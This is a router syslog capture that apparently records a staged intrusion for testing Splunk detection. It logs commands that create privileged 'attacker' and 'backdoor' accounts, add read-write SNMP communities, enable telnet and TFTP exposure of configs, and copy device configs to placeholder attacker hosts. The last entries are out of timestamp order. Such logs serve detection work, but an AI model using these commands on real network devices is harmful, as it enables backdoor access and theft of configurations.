Aug 20 21:46:10 52.53.165.221 197: 000192: *Aug 20 21:46:08.890 UTC: %SSH-5-SSH2_CLOSE: SSH2 Session from 76.154.218.105 (tty = 0) for user 'ec2-user' using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' closed
Aug 20 21:46:09 52.53.165.221 196: 000191: *Aug 20 21:46:08.890 UTC: %SYS-6-LOGOUT: User ec2-user has exited tty session 434(76.154.218.105)
Aug 20 21:46:09 52.53.165.221 195: 000190: *Aug 20 21:46:08.890 UTC: %SYS-6-TTY_EXPIRE_TIMER: (exec timer expired, tty 434 (76.154.218.105)), user ec2-user
Aug 20 21:35:46 52.53.165.221 194: 000189: *Aug 20 21:35:44.567 UTC: %SSH-5-SSH2_USERAUTH: User 'ec2-user' authentication for SSH2 Session from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:35:45 52.53.165.221 193: 000188: *Aug 20 21:35:44.567 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: ec2-user] [Source: 76.154.218.105] [localport: 22] at 21:35:44 UTC Wed Aug 20 2025
Aug 20 21:35:45 52.53.165.221 192: 000187: *Aug 20 21:35:44.566 UTC: %SSH-5-SSH_COMPLIANCE_VIOLATION_PK_ALGO: SSH Public-key Algorithm compliance violation detected.Kindly note that weaker Public-key Algorithm 'ssh-rsa' will be disabled by-default in the upcoming releases.Please configure more stronger PK algorithms to avoid service impact.
Aug 20 21:35:45 52.53.165.221 191: 000186: *Aug 20 21:35:44.247 UTC: %SSH-5-SSH2_SESSION: SSH2 Session request from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:35:42 52.53.165.221 190: 000185: *Aug 20 21:35:40.766 UTC: %SSH-5-SSH2_CLOSE: SSH2 Session from 76.154.218.105 (tty = 0) for user '' using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' closed
Aug 20 21:35:42 52.53.165.221 189: 000184: *Aug 20 21:35:40.766 UTC: %SSH-5-SSH2_USERAUTH: User '' authentication for SSH2 Session from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Failed
Aug 20 21:35:25 52.53.165.221 188: 000183: *Aug 20 21:35:23.994 UTC: %SSH-5-SSH2_SESSION: SSH2 Session request from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:35:12 52.53.165.221 187: 000182: *Aug 20 21:35:11.369 UTC: %SSH-5-SSH2_CLOSE: SSH2 Session from 76.154.218.105 (tty = 0) for user 'ec2-user' using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' closed
Aug 20 21:35:11 52.53.165.221 186: 000181: *Aug 20 21:35:11.369 UTC: %SYS-6-LOGOUT: User ec2-user has exited tty session 434(76.154.218.105)
Aug 20 21:35:11 52.53.165.221 185: 000180: *Aug 20 21:35:10.120 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty0 (76.154.218.105)
Aug 20 21:35:03 52.53.165.221 184: 000179: *Aug 20 21:35:01.493 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:exit 
Aug 20 21:34:54 52.53.165.221 183: 000178: *Aug 20 21:34:52.740 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:line console 0
Aug 20 21:34:50 52.53.165.221 182: 000177: *Aug 20 21:34:49.209 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:exit 
Aug 20 21:34:47 52.53.165.221 181: 000176: *Aug 20 21:34:46.395 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:transport input ssh telnet 
Aug 20 21:34:39 52.53.165.221 180: 000175: *Aug 20 21:34:38.090 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:line vty 0 15
Aug 20 21:34:33 52.53.165.221 179: 000174: *Aug 20 21:34:32.382 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:tftp-server bootflash:info 
Aug 20 21:34:29 52.53.165.221 178: 000173: *Aug 20 21:34:28.358 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:tftp-server system:running-config 
Aug 20 21:34:22 52.53.165.221 177: 000172: *Aug 20 21:34:20.714 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:tftp-server bootflash:running-config 
Aug 20 21:34:16 52.53.165.221 176: 000171: *Aug 20 21:34:14.949 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:snmp-server host 203.0.113.50 *
Aug 20 21:34:12 52.53.165.221 175: 000170: *Aug 20 21:34:11.011 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:snmp-server community * rw 
Aug 20 21:34:09 52.53.165.221 174: 000169: *Aug 20 21:34:07.691 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:snmp-server community * rw 
Aug 20 21:34:05 52.53.165.221 173: 000168: *Aug 20 21:34:03.778 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:snmp-server community * ro 
Aug 20 21:33:59 52.53.165.221 172: 000167: *Aug 20 21:33:58.104 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:exit 
Aug 20 21:33:56 52.53.165.221 171: 000166: *Aug 20 21:33:55.322 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:ip address 192.168.100.1 255.255.255.0
Aug 20 21:33:52 52.53.165.221 170: 000165: *Aug 20 21:33:51.387 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:description Backdoor interface
Aug 20 21:33:49 52.53.165.221 169: 000164: *Aug 20 21:33:48.040 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:interface Loopback200 
Aug 20 21:33:48 52.53.165.221 168: 000163: *Aug 20 21:33:48.038 UTC: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback200, changed state to up
Aug 20 21:33:44 52.53.165.221 167: 000162: *Aug 20 21:33:43.072 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:exit 
Aug 20 21:33:42 52.53.165.221 166: 000161: *Aug 20 21:33:40.849 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:ip address 10.10.10.1 255.255.255.0
Aug 20 21:33:37 52.53.165.221 165: 000160: *Aug 20 21:33:35.987 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:description Attacker test interface
Aug 20 21:33:33 52.53.165.221 164: 000159: *Aug 20 21:33:32.153 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:interface Loopback100 
Aug 20 21:33:32 52.53.165.221 163: 000158: *Aug 20 21:33:32.152 UTC: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback100, changed state to up
Aug 20 21:33:23 52.53.165.221 162: 000157: *Aug 20 21:33:22.072 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty0 (76.154.218.105)
Aug 20 21:33:21 52.53.165.221 161: 000156: *Aug 20 21:33:20.307 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:!config: USER TABLE MODIFIED
Aug 20 21:33:21 52.53.165.221 160: 000155: *Aug 20 21:33:20.307 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:username service privilege 15 secret *
Aug 20 21:33:20 52.53.165.221 159: 000154: *Aug 20 21:33:20.306 UTC: %AAA-6-USER_PRIVILEGE_UPDATE: username: service privilege updated with priv-15
Aug 20 21:33:20 52.53.165.221 158: 000153: *Aug 20 21:33:20.281 UTC: %AAA-6-USERNAME_CONFIGURATION: user with username: service configured
Aug 20 21:32:11 52.53.165.221 157: 000152: *Aug 20 21:32:09.629 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty0 (76.154.218.105)
Aug 20 21:31:43 52.53.165.221 156: 000151: *Aug 20 21:31:42.330 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:snmp-server community * rw 
Aug 20 21:31:40 52.53.165.221 155: 000150: *Aug 20 21:31:38.543 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:tftp-server nvram:startup-config 
Aug 20 21:31:36 52.53.165.221 154: 000149: *Aug 20 21:31:35.240 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:!config: USER TABLE MODIFIED
Aug 20 21:31:36 52.53.165.221 153: 000148: *Aug 20 21:31:35.240 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:username backdoor password 0 *
Aug 20 21:31:35 52.53.165.221 152: 000147: *Aug 20 21:31:35.240 UTC: %AAAA-4-CLI_DEPRECATED: WARNING: Command has been added to the configuration using a type 0 password. However, recommended to migrate to strong type-6 encryption
Aug 20 21:31:35 52.53.165.221 151: 000146: *Aug 20 21:31:35.240 UTC: %AAA-6-USERNAME_CONFIGURATION: user with username: backdoor configured
Aug 20 21:31:31 52.53.165.221 150: 000145: *Aug 20 21:31:30.331 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:!config: USER TABLE MODIFIED
Aug 20 21:31:31 52.53.165.221 149: 000144: *Aug 20 21:31:30.331 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:username attacker privilege 15 secret *
Aug 20 21:31:30 52.53.165.221 148: 000143: *Aug 20 21:31:30.330 UTC: %AAA-6-USER_PRIVILEGE_UPDATE: username: attacker privilege updated with priv-15
Aug 20 21:31:30 52.53.165.221 147: 000142: *Aug 20 21:31:30.305 UTC: %AAA-6-USERNAME_CONFIGURATION: user with username: attacker configured
Aug 20 21:21:15 52.53.165.221 146: 000141: *Aug 20 21:21:14.360 UTC: %SSH-5-SSH2_USERAUTH: User 'ec2-user' authentication for SSH2 Session from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:21:14 52.53.165.221 145: 000140: *Aug 20 21:21:14.360 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: ec2-user] [Source: 76.154.218.105] [localport: 22] at 21:21:14 UTC Wed Aug 20 2025
Aug 20 21:21:14 52.53.165.221 144: 000139: *Aug 20 21:21:14.358 UTC: %SSH-5-SSH_COMPLIANCE_VIOLATION_PK_ALGO: SSH Public-key Algorithm compliance violation detected.Kindly note that weaker Public-key Algorithm 'ssh-rsa' will be disabled by-default in the upcoming releases.Please configure more stronger PK algorithms to avoid service impact.
Aug 20 21:21:14 52.53.165.221 143: 000138: *Aug 20 21:21:14.052 UTC: %SSH-5-SSH2_SESSION: SSH2 Session request from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:16:05 52.53.165.221 142: 000137: *Aug 20 21:16:04.367 UTC: %SSH-5-SSH2_CLOSE: SSH2 Session from 76.154.218.105 (tty = 0) for user 'ec2-user' using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' closed
Aug 20 21:16:04 52.53.165.221 141: 000136: *Aug 20 21:16:04.367 UTC: %SYS-6-LOGOUT: User ec2-user has exited tty session 434(76.154.218.105)
Aug 20 21:16:04 52.53.165.221 140: 000135: *Aug 20 21:16:04.367 UTC: %SYS-6-TTY_EXPIRE_TIMER: (exec timer expired, tty 434 (76.154.218.105)), user ec2-user
Aug 20 21:02:51 52.53.165.221 139: 000134: *Aug 20 21:02:50.148 UTC: %LINK-5-CHANGED: Interface Loopback999, changed state to administratively down
Aug 20 21:02:51 52.53.165.221 138: 000133: *Aug 20 21:02:50.148 UTC: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback999, changed state to down
Aug 20 21:02:50 52.53.165.221 137: 000132: *Aug 20 21:02:49.860 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty0 (76.154.218.105)
Aug 20 21:02:49 52.53.165.221 136: 000131: *Aug 20 21:02:48.151 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:no interface Loopback999 
Aug 20 21:02:44 52.53.165.221 135: 000130: *Aug 20 21:02:42.816 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:description Testing Splunk logging
Aug 20 21:02:43 52.53.165.221 134: 000129: *Aug 20 21:02:41.913 UTC: %LINK-3-UPDOWN: Interface Loopback999, changed state to up
Aug 20 21:02:42 52.53.165.221 133: 000128: *Aug 20 21:02:41.912 UTC: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback999, changed state to up
Aug 20 21:02:41 52.53.165.221 132: 000127: *Aug 20 21:02:39.915 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:interface Loopback999 
Aug 20 21:02:38 52.53.165.221 131: 000126: *Aug 20 21:02:37.189 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:no username test-splunk
Aug 20 21:02:33 52.53.165.221 130: 000125: *Aug 20 21:02:31.747 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:!config: USER TABLE MODIFIED
Aug 20 21:02:33 52.53.165.221 129: 000124: *Aug 20 21:02:31.747 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user  logged command:username test-splunk privilege 15 secret *
Aug 20 21:02:32 52.53.165.221 128: 000123: *Aug 20 21:02:31.746 UTC: %AAA-6-USER_PRIVILEGE_UPDATE: username: test-splunk privilege updated with priv-15
Aug 20 21:02:32 52.53.165.221 127: 000122: *Aug 20 21:02:31.721 UTC: %AAA-6-USERNAME_CONFIGURATION: user with username: test-splunk configured
Aug 20 21:30:17 52.53.165.221 126: 000121: *Aug 20 21:30:17.147 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty1 (76.154.218.105)
Aug 20 21:30:17 52.53.165.221 125: 000120: *Aug 20 21:30:17.147 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:copy startup-config tftp://203.0.113.50/stolen-config.txt
Aug 20 21:30:18 52.53.165.221 124: 000119: *Aug 20 21:30:18.123 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:copy running-config tftp://attacker-server.com/device-config.txt